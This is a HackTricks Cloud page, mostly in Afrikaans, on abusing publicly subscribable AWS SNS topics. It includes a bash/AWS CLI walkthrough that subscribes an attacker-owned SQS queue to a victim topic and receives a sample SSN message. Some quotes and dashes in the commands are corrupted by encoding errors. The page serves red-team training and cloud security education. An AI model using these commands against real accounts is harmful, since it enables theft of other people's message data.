HackTricks CloudAWS - SNS Unauthenticated Enum
Tip
Leer & oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer & oefen Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subscription plans!
- Sluit aan by die đŹ Discord group of die telegram group of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking tricks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.
SNS
Vir meer inligting oor SNS sien:
Oop vir almal
Wanneer jy ân SNS topic vanaf die web console konfigureer is dit moontlik om aan te dui dat Everyone can publish and subscribe to the topic:
.png)
Dus, as jy die find the ARN of topics binne die account (of deur brute forcing van potensiële name vir topics) vind, kan jy check of jy kan publish of subscribe to them.
Dit sal gelykstaande wees aan ân SNS topic resource policy wat sns:Subscribe aan * (of aan eksterne rekeninge) toelaat; enige principal kan ân subscription skep wat alle toekomstige topic-berigte na ân SQS queue wat hulle besit lewer. Wanneer die queue-eienaar die subscription inisieer, is geen menslike bevestiging vereist vir SQS endpoints nie.
Reproduksie (us-east-1)
```bash REGION=us-east-1 # Victim account (topic owner) VICTIM_TOPIC_ARN=$(aws sns create-topic --name exfil-victim-topic-$(date +%s) --region $REGION --query TopicArn --output text)Open the topic to anyone subscribing
cat > /tmp/topic-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âOpenSubscribeâ,âEffectâ:âAllowâ,âPrincipalâ:â*â,âActionâ:âsns:Subscribeâ,âResourceâ:â$VICTIM_TOPIC_ARNâ}]} JSON aws sns set-topic-attributes âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âattribute-name Policy âattribute-value file:///tmp/topic-policy.json
Attacker account (queue owner)
ATTACKER_Q_URL=$(aws sqs create-queue âqueue-name attacker-exfil-queue-$(date +%s) âregion $REGION âquery QueueUrl âoutput text) ATTACKER_Q_ARN=$(aws sqs get-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattribute-names QueueArn âquery Attributes.QueueArn âoutput text)
Allow the victim topic to send to the attacker queue
cat > /tmp/sqs-policy.json <<JSON {âVersionâ:â2012-10-17â,âStatementâ:[{âSidâ:âAllowVictimTopicSendâ,âEffectâ:âAllowâ,âPrincipalâ:{âServiceâ:âsns.amazonaws.comâ},âActionâ:âsqs:SendMessageâ,âResourceâ:â$ATTACKER_Q_ARNâ,âConditionâ:{âArnEqualsâ:{âaws:SourceArnâ:â$VICTIM_TOPIC_ARNâ}}}]} JSON aws sqs set-queue-attributes âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âattributes Policy=â$(cat /tmp/sqs-policy.json)â
Subscribe the attacker queue to the victim topic (auto-confirmed for SQS)
SUB_ARN=$(aws sns subscribe âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âprotocol sqs ânotification-endpoint â$ATTACKER_Q_ARNâ âquery SubscriptionArn âoutput text)
Validation: publish and receive
aws sns publish âregion $REGION âtopic-arn â$VICTIM_TOPIC_ARNâ âmessage {pii:ssn:123-45-6789} aws sqs receive-message âqueue-url â$ATTACKER_Q_URLâ âregion $REGION âmax-number-of-messages 1 âwait-time-seconds 10 âquery Messages[0].Body âoutput text
</details>
> [!TIP]
> Leer & oefen AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Leer & oefen Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Ondersteun HackTricks</summary>
>
> - Kyk na die [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Sluit aan by die** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) of die [**telegram group**](https://t.me/peass) of **volg** ons op **Twitter** đŠ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Deel hacking tricks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>